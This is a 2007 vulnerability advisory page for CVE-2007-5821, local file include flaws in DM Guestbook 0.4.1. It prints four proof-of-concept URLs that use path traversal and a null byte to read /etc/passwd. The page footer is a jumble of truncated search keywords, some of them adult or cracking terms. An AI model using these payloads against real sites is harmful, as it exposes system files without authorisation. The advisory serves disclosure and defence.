about advertise contact
Search: Home Vulnerabilities Exploits News Articles RSS Feeds Archive Talk

exploits , vulnerabilities , articles , DM Guestbook Multiple Local File Include Vulnerabilities


Title DM Guestbook Multiple Local File Include Vulnerabilities
Published 2007-11-02-12:00AM
Updated 2007-11-15-12:37AM
Class Input Validation Error
CVE   CVE-2007-5821
Remote  Yes
Local  No
Credit   GoLd_M is credited with the discovery of these vulnerabilities.
Vulnerable  DM Guestbook 0.4.1
Not Vulnerable  
Code  Attackers may exploit these issues through a browser.The following proof-of-concept URIs are available:http://www.example.com/guestbook.php?lng=../../../../../../../etc/passwd%00
http://www.example.com/admin/admin.guestbook.php?lng=../../../../../../../etc/passwd%00
http://www.example.com/auto/glob_new.php?lng=../../../../../../../etc/passwd%00
http://www.example.com/auto/ch_lng.php?lngdefault=../../../../../../../etc/passwd%00
TXT  t3xt 1t!


Advertising

Copyright 2007, SecurityDot
Wed, 16 Dec 2009 21:30:04 +0000

Friends : milw0rm.com , secunia.com , securityfocus.com
GOOGLE
NEWS EXPLOITS VULNS
exploits , 0day exploits , newest exploits , vulnerabilities , newest vulnerabilities , 0day vulnerabilities , newest articles , linux articles , articles
IR3X 2...n.com/ sex free m www.filmne ldpinch.au 200 /compo Phone erot mambo Remo 2...n.com/ Pusy.ameri kaHT2 www,waptri bbs.ltdts. www.trish Eight 2....gr/LI 2...n.com/ news for c www.365pv. mysql 4.1. www.cjwend Www.funy v 2...n.com/ THE CRIDDL t570t Pelajar ma d...fx29id WWW.REDTUB 200 /compo 2...n.com/ all ...om_ components VNC Bypass 2...n.com/ 2...n.com/ news for c %09 Powe 2...n.com/ Moo 1.0.ht maxcpm.inf 2...n.com/ modernbill INDIAN SAX modernbill www.cdcity WWW.SEX IN asam Legend+of+ Lura Crack Data